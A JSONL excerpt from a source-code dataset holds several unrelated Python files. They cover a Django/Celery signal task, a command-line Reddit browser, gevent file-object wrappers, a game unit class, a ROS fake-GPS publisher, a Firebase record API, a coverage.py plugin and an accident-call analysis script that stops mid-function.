res.write(string)\n res.write(\"END\")\n#######################################################################################\n#processing data\nprint(input_pdb)\nprint(qm)\nqm_atom, qm_resi, qm_anam, qm_anum, qm_rnum= read_qm(qm)\nprint(\"Input\")\nprint(\"ATOM\",qm_atom)\nprint(\"RESI\",qm_resi)\nprint(\"ANUM\",qm_anum)\nprint(\"ANAM\",qm_anam)\nprint(\"RNUM\", qm_rnum)\n\norg_pdb, work_pdb, head = read_pdb(input_pdb)\n\n\npdb=atm_to_res(work_pdb)\n\natm_nr, atom_qm = assign_atm_nr(qm_atom, qm_resi, qm_anum, qm_anam, qm_rnum ,pdb) \n\n\npdb=proto_qm(pdb, atom_qm, f_p)\npdb =renumber_pdb(pdb)\natm_nr, atom_qm = assign_atm_nr(qm_atom, qm_resi, qm_anum, qm_anam, qm_rnum ,pdb) \n#print(\"atm_nr\",atm_nr)\n#for i in range(len(atom_qm)):\n# print(atom_qm[i])\n\ntrunc_nr, trunc_atm = find_truncation(atm_nr, atom_qm, pdb)\nf_all, f_qm, f_trunc = sum_list(atm_nr, atom_qm, trunc_nr, trunc_atm)\nprint(\" \")\nprint(\"f_all\",f_all)\n#print(\"f_qm\",f_qm)\nprint(\"f_trunc\",f_trunc)\nwrite_syst1(f_all,f_trunc)\nwrite_restart_anam(f_qm,work_pdb)\nwrite_rename(f_all,f_trunc,work_pdb)\nif f_p== True:\n write_pdb(pdb,head,input_pdb)\n\n\ntime_ende = time.time()\nprint(\"program ends normally after \"'{:5.3f}s'.format(time_ende-time_start),\" or \", '{:5.2f}min'.format((time_ende-time_start)/60))\n\n","sub_path":"gen_syst1.py","file_name":"gen_syst1.py","file_ext":"py","file_size_in_byte":42757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"585540947","text":"from celery import shared_task\nfrom celery.utils.log import get_task_logger\n\nfrom django.dispatch.dispatcher import (\n _make_id,\n Signal,\n)\n\n\n@shared_task\ndef propagate_signal(self, sender, **named):\n \"\"\"\n Send signal from sender to all connected receivers catching errors.\n\n Arguments:\n\n sender The sender of the signal. Can be any python object\n (normally one registered with a connect if you\n actually want something to occur).\n\n named\n Named arguments which will be passed to receivers. These\n arguments must be a subset of the argument names defined in\n providing_args.\n\n Return a list of tuple pairs [(receiver, response), ... ]. May raise\n DispatcherKeyError.\n\n If any receiver raises an error (specifically any subclass of\n Exception), the error instance is returned as the result for that\n receiver.\n \"\"\"\n\n logger = get_task_logger(__name__)\n logger.info(\"START propagate_signal\")\n logger.info(self)\n logger.info(sender)\n logger.info(_make_id(sender))\n logger.info(self._live_receivers(_make_id(sender)))\n \n # Call each receiver with whatever arguments it can accept.\n for receiver in self._live_receivers(_make_id(sender)):\n try:\n logger.info(\"START Receiver: {}; Signal: {}; sender: {}, kwargs:{}\".format(receiver,signal,sender,named))\n receiver(signal=self, sender=sender, **named)\n logger.info(\"END Receiver: {}; Signal: {}; sender: {}, kwargs:{}\".format(receiver,signal,sender,named))\n except Exception as ex:\n logger.info(\"EXCEPT START Receiver: {}; Signal: {}; sender: {}, kwargs:{}\".format(receiver,signal,sender,named))\n logger.error(ex)\n logger.info(\"EXCEPT END Receiver: {}; Signal: {}; sender: {}, kwargs:{}\".format(receiver,signal,sender,named))\n \n logger.info(\"END propagate_signal\")\n\n\n@shared_task\ndef call_receiver(receiver, self, sender, **named):\n receiver(signal=self, sender=sender, **named)\n \n","sub_path":"src/async_signals/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297417116","text":"# https://www.reddit.com/r/askreddit.json\n# https://shahriar.svbtle.com/underscores-in-python\n# Browse Reddit through your command line! You filthy nerd\n# Personal due date: Sunday Oct 16th? (idk)\n# Index +-> Post ~> PostContent +-> CommentThread\nimport requests\nimport json\nfrom pdb import set_trace as st\n\n\nUSER_AGENT = {'User-agent': '/u/aRealUser'}\nCOUNT = 0\n\n\nclass Index(object):\n \"\"\"Class that converts a JSON response to Python container types\"\"\"\n # Eventually be able to SCP / tunnel images onto client disk\n def __init__(self, subreddit, page=0):\n self.subreddit = subreddit\n self.page = self._get_page(\n subreddit=subreddit,\n page=page\n )\n self.page_loads = json.loads(self.page.text)\n self.posts = self._get_posts()\n\n def _get_page(self, subreddit, page):\n url = \"https://www.reddit.com/r/{0}/.json?&limit=100\".format(\n subreddit\n )\n return requests.get(url=url, headers=USER_AGENT)\n\n def _get_nav(self, after, before):\n if after:\n nav_str = \"&after=\" + after\n # Definitely the most confusing \"human readable\" conditional ever\n elif before and not after:\n nav_str = \"&before=\" + before\n else:\n nav_str = ''\n\n return nav_str\n\n def _sub_exists(self, url):\n return bool(self.page_loads['data']['children'])\n\n def _get_posts(self):\n if self._sub_exists(self.subreddit):\n try:\n post_loads = self.page_loads['data']['children']\n except KeyError:\n raise KeyError(\"Expected page_loads with ['data'] and ['children'] keys, got: {}\".format(self.page_loads))\n posts = []\n for info in post_loads:\n posts.append(Post(kwargs=info))\n\n else:\n raise KeyError(\"Sub does not exist!\")\n return posts\n\n\nclass Post(object):\n \"\"\"\n Struct to hold post information\n ##TODO: Explicit member initializations\n \"\"\"\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs['kwargs']['data'])\n\n def get_post_content(self):\n return PostContent(\n subreddit=self.subreddit,\n post_id=self.id\n )\n\n def __repr__(self):\n return self.title\n\n\nclass PostContent(object):\n \"\"\"\n Called when a user decides they want to view a particular post.\n Struct to hold Comment Threads and post content (text/links)\n \"\"\"\n def __init__(self, subreddit, post_id):\n self.page = self._get_page(subreddit, post_id)\n self.page_loads = json.loads(self.page.text)\n self.comments = self._get_comments()\n\n def _get_page(self, subreddit, post_id):\n url = \"https://www.reddit.com/r/{0}/comments/{1}.json\".format(subreddit, post_id)\n return requests.get(url=url, headers=USER_AGENT)\n\n def _get_comments(self):\n comment_json = self.page_loads[1]['data']['children']\n comments = []\n for thread in comment_json:\n if self.is_comment(thread):\n comments.append(CommentThread(comment_loads=thread['data']))\n\n return comments\n\n @staticmethod\n def is_comment(comment_json):\n return comment_json['kind'] != \"more\"\n\n\nclass CommentThread(object):\n \"\"\"\n Struct with comment and comment-reply data.\n Users will at first only see content 3 replies deep\n and 5 replies down.\n \"\"\"\n def __init__(self, comment_loads):\n self.author = comment_loads['author']\n self.body = comment_loads['body']\n self.gilded = comment_loads['gilded']\n self.created = comment_loads['created']\n self.score = comment_loads['score']\n self.comment_loads = comment_loads\n self.replies = self._get_replies(comment_loads['replies'])\n\n def _get_replies(self, replies):\n \"\"\"\n An accidentally recursive function to get replies and THOSE reply's replies\n and then THOSE reply's replies and then THOSE . . .\n \"\"\"\n reply_l = []\n\n if not replies:\n return reply_l\n\n for thread in replies['data']['children']:\n if PostContent.is_comment(thread) and self._has_replies(thread):\n comment_loads = thread['data']\n reply_l.append(CommentThread(comment_loads))\n\n return reply_l\n\n def _has_replies(self, thread):\n \"\"\"Checks if a thread has children or replies.\"\"\"\n return bool(thread['data']['replies'])\n\n def tree_repr(self, followed=False, depth=0):\n if depth == 0:\n print('~' * 60)\n print(self.body)\n print('~' * 60)\n\n depth += 1\n\n for reply in self.replies:\n print(('- ' * depth) + reply.body)\n\n # Pursue the next set of replies\n reply.tree_repr(followed=True, depth=depth)\n","sub_path":"Classes/reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162983366","text":"from __future__ import absolute_import, print_function, division\n\ntry:\n from errno import EBADF\nexcept ImportError:\n EBADF = 9\n\nimport os\nfrom io import TextIOWrapper\nimport functools\nimport sys\n\n\nfrom gevent.hub import _get_hub_noargs as get_hub\nfrom gevent._compat import integer_types\nfrom gevent._compat import reraise\nfrom gevent.lock import Semaphore, DummySemaphore\n\nclass cancel_wait_ex(IOError):\n\n def __init__(self):\n super(cancel_wait_ex, self).__init__(\n EBADF, 'File descriptor was closed in another greenlet')\n\n\nclass FileObjectClosed(IOError):\n\n def __init__(self):\n super(FileObjectClosed, self).__init__(\n EBADF, 'Bad file descriptor (FileObject was closed)')\n\nclass FileObjectBase(object):\n \"\"\"\n Internal base class to ensure a level of consistency\n between FileObjectPosix and FileObjectThread\n \"\"\"\n\n # List of methods we delegate to the wrapping IO object, if they\n # implement them and we do not.\n _delegate_methods = (\n # General methods\n 'flush',\n 'fileno',\n 'writable',\n 'readable',\n 'seek',\n 'seekable',\n 'tell',\n\n # Read\n 'read',\n 'readline',\n 'readlines',\n 'read1',\n\n # Write\n 'write',\n 'writelines',\n 'truncate',\n )\n\n\n # Whether we are translating universal newlines or not.\n _translate = False\n\n _translate_encoding = None\n _translate_errors = None\n\n def __init__(self, io, closefd):\n \"\"\"\n :param io: An io.IOBase-like object.\n \"\"\"\n self._io = io\n # We don't actually use this property ourself, but we save it (and\n # pass it along) for compatibility.\n self._close = closefd\n\n if self._translate:\n # This automatically handles delegation by assigning to\n # self.io\n self.translate_newlines(None, self._translate_encoding, self._translate_errors)\n else:\n self._do_delegate_methods()\n\n\n io = property(lambda s: s._io,\n # Historically we either hand-wrote all the delegation methods\n # to use self.io, or we simply used __getattr__ to look them up at\n # runtime. This meant people could change the io attribute on the fly\n # and it would mostly work (subprocess.py used to do that). We don't recommend\n # that, but we still support it.\n lambda s, nv: setattr(s, '_io', nv) or s._do_delegate_methods())\n\n def _do_delegate_methods(self):\n for meth_name in self._delegate_methods:\n meth = getattr(self._io, meth_name, None)\n implemented_by_class = hasattr(type(self), meth_name)\n if meth and not implemented_by_class:\n setattr(self, meth_name, self._wrap_method(meth))\n elif hasattr(self, meth_name) and not implemented_by_class:\n delattr(self, meth_name)\n\n def _wrap_method(self, method):\n \"\"\"\n Wrap a method we're copying into our dictionary from the underlying\n io object to do something special or different, if necessary.\n \"\"\"\n return method\n\n def translate_newlines(self, mode, *text_args, **text_kwargs):\n wrapper = TextIOWrapper(self._io, *text_args, **text_kwargs)\n if mode:\n wrapper.mode = mode\n self.io = wrapper\n self._translate = True\n\n @property\n def closed(self):\n \"\"\"True if the file is closed\"\"\"\n return self._io is None\n\n def close(self):\n if self._io is None:\n return\n\n io = self._io\n self._io = None\n self._do_close(io, self._close)\n\n def _do_close(self, fobj, closefd):\n raise NotImplementedError()\n\n def __getattr__(self, name):\n if self._io is None:\n raise FileObjectClosed()\n return getattr(self._io, name)\n\n def __repr__(self):\n return '<%s _fobj=%r%s>' % (self.__class__.__name__, self.io, self._extra_repr())\n\n def _extra_repr(self):\n return ''\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n self.close()\n\nclass FileObjectBlock(FileObjectBase):\n\n def __init__(self, fobj, *args, **kwargs):\n closefd = kwargs.pop('close', True)\n if kwargs:\n raise TypeError('Unexpected arguments: %r' % kwargs.keys())\n if isinstance(fobj, integer_types):\n if not closefd:\n # we cannot do this, since fdopen object will close the descriptor\n raise TypeError('FileObjectBlock does not support close=False on an fd.')\n fobj = os.fdopen(fobj, *args)\n super(FileObjectBlock, self).__init__(fobj, closefd)\n\n def _do_close(self, fobj, closefd):\n fobj.close()\n\nclass FileObjectThread(FileObjectBase):\n \"\"\"\n A file-like object wrapping another file-like object, performing all blocking\n operations on that object in a background thread.\n\n .. caution::\n Attempting to change the threadpool or lock of an existing FileObjectThread\n has undefined consequences.\n\n .. versionchanged:: 1.1b1\n The file object is closed using the threadpool. Note that whether or\n not this action is synchronous or asynchronous is not documented.\n\n \"\"\"\n\n def __init__(self, fobj, mode=None, bufsize=-1, close=True, threadpool=None, lock=True):\n \"\"\"\n :param fobj: The underlying file-like object to wrap, or an integer fileno\n that will be pass to :func:`os.fdopen` along with *mode* and *bufsize*.\n :keyword bool lock: If True (the default) then all operations will\n be performed one-by-one. Note that this does not guarantee that, if using\n this file object from multiple threads/greenlets, operations will be performed\n in any particular order, only that no two operations will be attempted at the\n same time. You can also pass your own :class:`gevent.lock.Semaphore` to synchronize\n file operations with an external resource.\n :keyword bool close: If True (the default) then when this object is closed,\n the underlying object is closed as well.\n \"\"\"\n closefd = close\n self.threadpool = threadpool or get_hub().threadpool\n self.lock = lock\n if self.lock is True:\n self.lock = Semaphore()\n elif not self.lock:\n self.lock = DummySemaphore()\n if not hasattr(self.lock, '__enter__'):\n raise TypeError('Expected a Semaphore or boolean, got %r' % type(self.lock))\n if isinstance(fobj, integer_types):\n if not closefd:\n # we cannot do this, since fdopen object will close the descriptor\n raise TypeError('FileObjectThread does not support close=False on an fd.')\n if mode is None:\n assert bufsize == -1, \"If you use the default mode, you can't choose a bufsize\"\n fobj = os.fdopen(fobj)\n else:\n fobj = os.fdopen(fobj, mode, bufsize)\n\n self.__io_holder = [fobj] # signal for _wrap_method\n super(FileObjectThread, self).__init__(fobj, closefd)\n\n def _do_close(self, fobj, closefd):\n self.__io_holder[0] = None # for _wrap_method\n try:\n with self.lock:\n self.threadpool.apply(fobj.flush)\n finally:\n if closefd:\n # Note that we're not taking the lock; older code\n # did fobj.close() without going through the threadpool at all,\n # so acquiring the lock could potentially introduce deadlocks\n # that weren't present before. Avoiding the lock doesn't make\n # the existing race condition any worse.\n # We wrap the close in an exception handler and re-raise directly\n # to avoid the (common, expected) IOError from being logged by the pool\n def close(_fobj=fobj):\n try:\n _fobj.close()\n except: # pylint:disable=bare-except\n return sys.exc_info()\n finally:\n _fobj = None\n del fobj\n\n exc_info = self.threadpool.apply(close)\n del close\n\n if exc_info:\n reraise(*exc_info)\n\n def _do_delegate_methods(self):\n super(FileObjectThread, self)._do_delegate_methods()\n if not hasattr(self, 'read1') and 'r' in getattr(self._io, 'mode', ''):\n self.read1 = self.read\n self.__io_holder[0] = self._io\n\n def _extra_repr(self):\n return ' threadpool=%r' % (self.threadpool,)\n\n def __iter__(self):\n return self\n\n def next(self):\n line = self.readline()\n if line:\n return line\n raise StopIteration\n __next__ = next\n\n def _wrap_method(self, method):\n # NOTE: We are careful to avoid introducing a refcycle\n # within self. Our wrapper cannot refer to self.\n io_holder = self.__io_holder\n lock = self.lock\n threadpool = self.threadpool\n\n @functools.wraps(method)\n def thread_method(*args, **kwargs):\n if io_holder[0] is None:\n # This is different than FileObjectPosix, etc,\n # because we want to save the expensive trip through\n # the threadpool.\n raise FileObjectClosed()\n with lock:\n return threadpool.apply(method, args, kwargs)\n\n return thread_method\n","sub_path":"venv/Lib/site-packages/gevent/_fileobjectcommon.py","file_name":"_fileobjectcommon.py","file_ext":"py","file_size_in_byte":9652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469284195","text":"#!/usr/bin/env python2.7\n# -*- coding:UTF-8 -*-2\nu\"\"\"player.py\n\nCopyright(c)2019 Yukio Kuro\nThis software is released under BSD license.\n\nプレイヤーモジュール。\n\"\"\"\nimport unit as __unit\nimport utils.memoize as _memoize\n\n\nclass Player(__unit.Unit):\n u\"\"\"プレイヤー。\n \"\"\"\n _PLANET = 0\n _ABILITY = []\n\n def __init__(self, pos, data, packet, group=None):\n u\"\"\"コンストラクタ。\n \"\"\"\n self.__is_another = False\n super(Player, self).__init__(pos, data, packet, group)\n\n def __repr__(self):\n u\"\"\"文字列表現取得。\n \"\"\"\n return (\n u\"\").format(\n type=self.__class__.__name__, name=self._data.name,\n power_up=self.power_up_level,\n direction=\"Right\" if self._is_right else \"Left\",\n another=\"Another\" if self.__is_another else \"Basic\")\n\n def set_equip(self, wp, hlm, armr, acs):\n u\"\"\"装備設定。\n \"\"\"\n import armament.equip as __equip\n\n class __BrokenEquip(object):\n u\"\"\"装備データアダプタ。\n 装備の破損を表現する。\n \"\"\"\n __slots__ = \"__data\", \"__broken\"\n __TIME_TO_RECOVERY = 6\n\n def __init__(self, data):\n u\"\"\"コンストラクタ。\n data: 装備データ。\n \"\"\"\n self.__data = data\n self.__broken = 0\n\n def __repr__(self):\n u\"\"\"文字列表現取得。\n \"\"\"\n return self.__data.__repr__()\n\n def get_special(self, lv):\n u\"\"\"武器効果取得。\n \"\"\"\n effect = self.__data.get_special(lv)\n return effect if effect and not self.__is_broken else ()\n\n def get_sustain(self, turn):\n u\"\"\"頭防具効果取得。\n \"\"\"\n effect = self.__data.get_sustain(turn)\n return effect if effect and not self.__is_broken else ()\n\n def is_prevents(self, target):\n u\"\"\"ブロック変化防止判定。\n \"\"\"\n if self.__data.is_prevents(target) and not self.__is_broken:\n return True\n else:\n return False\n\n def break_(self):\n u\"\"\"破損させる。\n \"\"\"\n self.__broken = self.__TIME_TO_RECOVERY\n\n def repair(self):\n u\"\"\"修復する。\n 修復した場合、Trueを返す。\n \"\"\"\n if 0 < self.__broken:\n self.__broken = 0\n return True\n return False\n\n @property\n def name(self):\n u\"\"\"名前取得。\n \"\"\"\n return self.__data.name\n\n @property\n def number(self):\n u\"\"\"番号取得。\n \"\"\"\n return self.__data.number\n\n @property\n def additional(self):\n u\"\"\"アクセサリによるパターン変更リクエストを取得。\n \"\"\"\n return (\n self.__data.additional if self.__data.additional and\n not self.__is_broken else ())\n\n @property\n def value(self):\n u\"\"\"能力値取得。\n \"\"\"\n return 0 if self.__is_broken else self.__data.value\n\n @property\n def icon(self):\n u\"\"\"画像番号からアイコン取得。\n \"\"\"\n return self.__data.icon\n\n @property\n def is_useable(self):\n u\"\"\"使用可能状態取得。\n \"\"\"\n return (\n False if self.__data.number == 0 else\n self.__broken <= 0)\n\n @property\n def __is_broken(self):\n u\"\"\"破損状態取得。\n 徐々に修復される。\n \"\"\"\n if 0 < self.__broken:\n self.__broken -= 1\n return True\n else:\n return False\n self.__equip = (\n __BrokenEquip(__equip.get(wp)),\n __BrokenEquip(__equip.get(hlm)),\n __BrokenEquip(__equip.get(armr)),\n __BrokenEquip(__equip.get(acs)))\n\n def add_effect(self, effect):\n u\"\"\"エフェクト追加。\n すでに文字表示エフェクトが存在する場合は、eliminateする。\n \"\"\"\n if self._effect and not self._effect.is_dead:\n self._effect.eliminate()\n self._effect = None\n self._effect = effect\n\n def attack(self):\n u\"\"\"攻撃処理。\n \"\"\"\n lv = self._power/self._packet\n power = self.release()\n if 0 < power:\n self.flash()\n stroke = self._get_attack(\n self._data.str+self.weapon.value, self.attack_level, power)\n return stroke, lv\n return 0, 0\n\n @property\n def _vit(self):\n u\"\"\"ユニットの守り+装備の防御力取得。\n \"\"\"\n return (\n self._data.vit+self.helm.value +\n self.armor.value+self.accessory.value)\n\n @property\n def base_image(self):\n u\"\"\"基本画像取得。\n \"\"\"\n return self._data.get_image(False, self.__is_another)\n\n @property\n @_memoize.memoize()\n def current_image(self):\n u\"\"\"現在画像取得。\n \"\"\"\n return self.data.get_image(self.is_right, self.__is_another)\n\n @property\n def is_another(self):\n u\"\"\"アナザー状態取得。\n \"\"\"\n return self.__is_another\n\n @is_another.setter\n def is_another(self, value):\n u\"\"\"アナザー状態設定。\n \"\"\"\n self.__is_another = bool(value)\n self.image = self.current_image\n\n @property\n def equip(self):\n u\"\"\"装備取得。\n \"\"\"\n return self.__equip\n\n @property\n def weapon(self):\n u\"\"\"武器取得。\n \"\"\"\n weapon, _, _, _ = self.__equip\n return weapon\n\n @property\n def helm(self):\n u\"\"\"頭防具取得。\n \"\"\"\n _, helm, _, _ = self.__equip\n return helm\n\n @property\n def armor(self):\n u\"\"\"体防具取得。\n \"\"\"\n _, _, armor, _ = self.__equip\n return armor\n\n @property\n def accessory(self):\n u\"\"\"装飾品取得。\n \"\"\"\n _, _, _, accessory = self.__equip\n return accessory\n","sub_path":"Source/armament/units/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":6838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"315666584","text":"#!/usr/bin/env python\nfrom time import sleep\n\nimport rospy\nfrom std_msgs.msg import Int16\nfrom geometry_msgs.msg import PoseStamped\nfrom ifutr.msg import Pozyx_Pose\n\n\n\n\n\nclass Fake_GPS(object):\n\n def __init__(self):\n self.r = rospy.Rate(5)\n self.pub = rospy.Publisher('/mavros/mocap/pose', PoseStamped, queue_size=10)\n self.sub = rospy.Subscriber('/pose', PoseStamped, self.poseCallback)\n self.gps = PoseStamped()\n\n\n def poseCallback(self, msg):\n self.gps = msg\n #print(self.gps)\n\n\n def run(self):\n while not rospy.is_shutdown():\n self.gps.header.stamp = rospy.Time.now()\n self.gps.header.frame_id = 'map'\n #self.pose.pose.position.x = position.x\n #self.pose.pose.position.y = position.y\n #self.pose.pose.position.z = position.z\n #self.gps.pose.position.x = 1.5\n #self.gps.pose.position.y = 1.5\n #self.gps.pose.position.z = 1.5\n self.gps.pose.orientation.w = 1.0\n self.pub.publish(self.gps)\n self.r.sleep()\n\n\ndef initialize():\n rospy.init_node('Fake_GPS', anonymous=False)\n\n\n\nif __name__ == \"__main__\":\n initialize()\n g = Fake_GPS()\n g.run()\n","sub_path":"ifutr/scripts/sensors/GPS.py","file_name":"GPS.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"277188460","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function\n\nfrom flask import request, g\n\nfrom . import Resource\nfrom .. import schemas\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport json\n\nclass Record(Resource):\n\n def get(self):\n if firebase_admin._DEFAULT_APP_NAME not in firebase_admin._apps:\n cred = credentials.Certificate('serviceAccountKey.json')\n firebase_admin.initialize_app(cred)\n db = firestore.client()\n records_ref = db.collection(u'records')\n\n print(g.args)\n if 'SupervisorID' in g.args.keys():\n query = records_ref.where(u'supervisor_uid', u'==', g.args['SupervisorID']).where(u'record_status', u'==', g.args['record_status']).stream()\n docs = []\n print('AAAAAAA')\n for doc in query:\n docs.append((doc.id, doc.to_dict()))\n if docs == []:\n respond = {'status': 1}\n return respond, 404, None\n print(docs)\n body=[]\n for doc in docs:\n body.append({'RecordID':doc[1],'record_name':doc[1]['record_name'],'log_name':doc[1]['log_name'],'user_email':doc[1]['user_email']})\n respond=body\n print(respond)\n return respond,200,None\n if 'userID' in g.args.keys():\n query = records_ref.where(u'user_email', u'==', g.args['userID']).where(u'record_status', u'==', g.args['record_status']).stream()\n docs = []\n for doc in query:\n docs.append((doc.id, doc.to_dict()))\n if docs == []:\n respond = {'status': 1}\n return respond, 404, None\n body=[]\n for doc in docs:\n body.append({'RecordID':doc[0],'record_name':doc[1]['record_name'],'log_name':doc[1]['log_name'],'user_email':doc[1]['user_email']})\n return {'status':0,'body':body},200,None\n","sub_path":"chatbot/app13/demo/v1/api/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48115715","text":"# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0\n# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt\n\n\"\"\"A configuring plugin for test_plugins.py to import.\"\"\"\n\nimport coverage\n\n\nclass Plugin(coverage.CoveragePlugin):\n \"\"\"A configuring plugin for testing.\"\"\"\n def configure(self, config):\n \"\"\"Configure all the things!\"\"\"\n opt_name = \"report:exclude_lines\"\n exclude_lines = config.get_option(opt_name)\n exclude_lines.append(r\"pragma: custom\")\n exclude_lines.append(r\"pragma: or whatever\")\n config.set_option(opt_name, exclude_lines)\n\n\ndef coverage_init(reg, options): # pylint: disable=unused-argument\n \"\"\"Called by coverage to initialize the plugins here.\"\"\"\n reg.add_configurer(Plugin())\n","sub_path":"tests/plugin_config.py","file_name":"plugin_config.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"191052823","text":"import pandas\nimport xlrd\nimport xlsxwriter\nfrom decimal import Decimal\nfrom datetime import datetime, date\nimport numpy\nimport math\nimport time\n# import xlutils.copy\n\n\n# bringing info from the excel file in to work on. Remember if you move this file, change this location.\ndef import_excel_file(file_name, datetime_col_name):\n data_file_name = pandas.read_excel(file_name)\n # get data frame with the selected columns.\n data_file_name = split_datetime(data_file_name, datetime_col_name)\n print('Import complete')\n return data_file_name\n\n\n# printing column names, if needed.\ndef get_col_names(data_file_name):\n print(data_file_name.columns)\n\n\n# printing values for a given column, if needed.\ndef get_col_values(data_file_name, name_of_column):\n values = data_file_name['name_of_column'].values\n print(values)\n\n\n# splitting 'Response_Date' into date and time columns.\ndef split_datetime(data_file_name, datetime_col_name):\n data_file_name['Date'] = data_file_name[datetime_col_name].dt.date\n data_file_name['Time'] = data_file_name[datetime_col_name].dt.time\n print('Time/Date Split complete.')\n return data_file_name\n\n\n# Dropping calls with NaN entries\ndef drop_empties(data_file_name):\n data_file_name = data_file_name.dropna()\n print('Empties dispose Complete')\n return data_file_name\n\n\n# this is the length of the dataframe, in case there are more entries added.\ndef get_length(data_file_name):\n length = len(data_file_name.index)\n\n\n# for some reason the formatting in lat/lng isn't importing properly, so divide to get the correct locations\n# and save the information to the Call_Information file.\ndef correct_LatLong(data_file_name, length):\n for index in data_file_name.ix[1:].iterrows():\n index[1]['Latitude'] = (int(index[1]['Latitude']) / 1000000)\n index[1]['Longitude'] = (int(index[1]['Longitude']) / 1000000)\n i = index[0]\n # If the loop reaches the end of the file, then save the information in the file.\n if i is length:\n save_excel_file('Call_Information.xlsx', 'Call Information', data_file_name)\n return data_file_name\n\n\n# counting occurrence of each type of report. Sorts list in order of number of occurrences for each type\ndef count_occurrences(data_file_name, occurrence_list):\n count = pandas.Series({w: data_file_name['Problem'].str.contains(w, case=False).sum() for w in occurrence_list})\n count = count.sort_values(ascending=False)\n print(count)\n\n\ndef count_days(data_file_name, days_list):\n count = pandas.Series({w: data_file_name['Date'].str.contains(w, case=False).sum() for w in days_list})\n count = count.sort_values(ascending=False)\n print(count)\n\n\ndef find_Duplicates(data_file_name, occurrence_list):\n count_doubles = 0\n data_file_copy = data_file_name.copy()\n # this goes through the data and finds duplicates, based on a maximum of 4 minutes between calls,\n # and a change in lat/long location of less than .000001.\n for id1, id2 in zip(data_file_copy.iterrows(), data_file_copy.loc[1:].iterrows()):\n # this duration takes the difference between two times and returns it\n duration = datetime.combine(date.min, id2[1]['Time']) - datetime.combine(date.min, (id1[1]['Time']))\n # this duration gathers the seconds from the duration above then the minutes line changes that number\n # to the absolute value of the actual number of minutes, ignoring\n duration = duration.total_seconds()\n minutes = math.fabs(duration / 60.0)\n # this section is testing whether the calls inside the 4 minute threshold are actually\n # close enough together to be regarding the same accident\n if minutes < 4:\n # if the calls are within 4 minutes of one another, are the lat and long in close proximity as well?\n # the division by 1 mil is required in each loop, since for some reason it refuses to save in the dataframe.\n correct_LatLong(data_file_copy, get_length(data_file_copy))\n # find the absolute value of the change in both lat and lng.\n latChange = math.fabs(id1[1]['Latitude'] - id2[1]['Latitude'])\n longChange = math.fabs(id1[1]['Longitude'] - id2[1]['Longitude'])\n # if the lat/long are in close proximity, print the information.\n if latChange < 0.0001 and longChange < 0.0001:\n # this increments the count of the doubles found.\n count_doubles += 1\n # deciding which entry will be recorded/deleted, based off problem level\n # this section deletes any blank space left at the beginning of the cell by the data enterer.\n problem1 = id1[1]['Problem'].lstrip()\n problem2 = id2[1]['Problem'].lstrip()\n # printing to be sure the levels are reporting properly.\n # print(\"Problem of first call: \", problem1, \". Level of first call:\", occurrence_list.index(problem1))\n # print(\"Problem of second call: \", problem2, \". Level of second call:\", occurrence_list.index(problem2))\n # if the level on the index of the first call is a higher concern than the second.\n if occurrence_list.index(problem1) >= occurrence_list.index(problem2):\n print(id2[0])\n data_file_name.drop(id2[0])\n # just delete the other call instead of making a variable here.\n # if the level on the second call is higher than the first\n else:\n print(id1[0])\n data_file_name.drop(id1[0])\n # more printing to make sure everything is working correctly.\n # print(\"Highest level problem:\" ,problem)\n # print ('Duration: %.5f ' % minutes, 'Lat1:',id1[1]['Latitude'], 'Lat2:',id2[1]['Latitude'])\n # print( 'Change: %.6f ' % latChange)\n # print ('Long1:',id1[1]['Longitude'], 'Long2:',id2[1]['Longitude'], 'Change: %.6f ' % longChange)\n # Print the number of total duplicate calls.\n print(\"There were :\", count_doubles, \"occurrences of duplicate calls.\")\n return data_file_name\n\n\n# Saving this set to a new excel sheet, when you're done\ndef save_excel_file(save_file_name, sheet, data_file_name):\n writer = pandas.ExcelWriter(save_file_name, engine='xlsxwriter', date_format='mmm d yyyy')\n data_file_name.to_excel(writer, sheet_name=sheet)\n workbook = writer.book\n worksheet = writer.sheets[sheet]\n writer.save()\n\n\ndef save_text_file(CSV_save_file_name, data_file_name):\n data_file_name.to_csv(CSV_save_file_name, sep=',', index=False)\n\n\ndef drop_duplicates(data_file_name, drop_name):\n # i = 0\n # while i < (len(drop_name)):\n for i in range(len(drop_name)):\n data_file_name.drop(data_file_name.index[drop_name[0][i]])\n print ('Dropping row at index {}'.format(drop_name[0][i]))\n # i += 1\n\n print (data_file_name.head())\n return data_file_name\n\ndef main():\n file_name = 'Accident Report - 4-29-2015 - 4-29-2018.xls'\n save_file_name = 'Call_Information.xls'\n sheet = 'Call Information'\n datetime_col_name = 'Response_Date'\n FORMAT = ['Latitude', 'Longitude', 'Date', 'Time', 'Problem']\n occurrence_list = ['Unknown Injuries', 'Delayed', 'No Injuries', 'Injuries', 'Entrapment', 'Mass Casualty']\n days_list = ['Sunday','Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sunday']\n\n data_file_name = import_excel_file(file_name, datetime_col_name)\n data_file_name = data_file_name[FORMAT]\n data_file_name = drop_empties(data_file_name)\n data_file_name = correct_LatLong(data_file_name, get_length(data_file_name))\n count_occurrences(data_file_name, occurrence_list)\n\n 